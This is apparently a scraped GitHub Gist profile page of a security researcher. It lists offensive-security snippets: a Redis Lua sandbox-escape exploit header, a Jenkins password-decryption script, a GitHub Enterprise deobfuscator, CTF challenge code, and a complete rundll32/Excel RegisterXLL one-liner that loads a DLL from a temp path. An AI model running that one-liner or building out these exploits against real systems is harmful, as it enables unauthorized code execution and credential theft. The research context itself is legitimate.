Skip to content

Instantly share code, notes, and snippets.

This is orange!

Orange Tsai orangetw

This is orange!
View GitHub Profile
orangetw /
Created Nov 19, 2017 — forked from nicolas-grekas/
Advanced handling of HTTP requests in PHP
View introspection-query.graphql
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
directives {
orangetw / all.txt
Created Sep 7, 2018 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
orangetw /
Created Feb 12, 2019 — forked from c3c/
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system"
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
View bounties.csv
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00
CVE-2015-3842 Android 2,000.00
CVE-2015-3847 Android 1,500.00
CVE-2015-3860 Android 500.00
CVE-2015-3862 Android 333.00
CVE-2015-3865 Android 1,500.00
CVE-2015-3867 Android 4,000.00
CVE-2015-3868 Android 4,000.00
CVE-2015-3869 Android 3,000.00
View jenkins-decrypt.groovy
#To Decrypt Jenkins Password from credentials.xml
#go to the jenkins url
#In the console paste the script
orangetw / excel.bat
Created Jul 22, 2017 — forked from ryhanson/
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
#!/usr/bin/sudo sh
## -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings`:
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
## Well, good, as long as its not intended to discourage *me* from doing this!
orangetw / babyfirst.php
Created Oct 19, 2015
HITCON CTF 2015 Quals Babyfirst
View babyfirst.php
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
orangetw / sqlpwn.php
Created Sep 10, 2015
AIS3 Final CTF Web
View sqlpwn.php
sqlpwn by orange
Don't brute force or you will be banned !
include "template.html";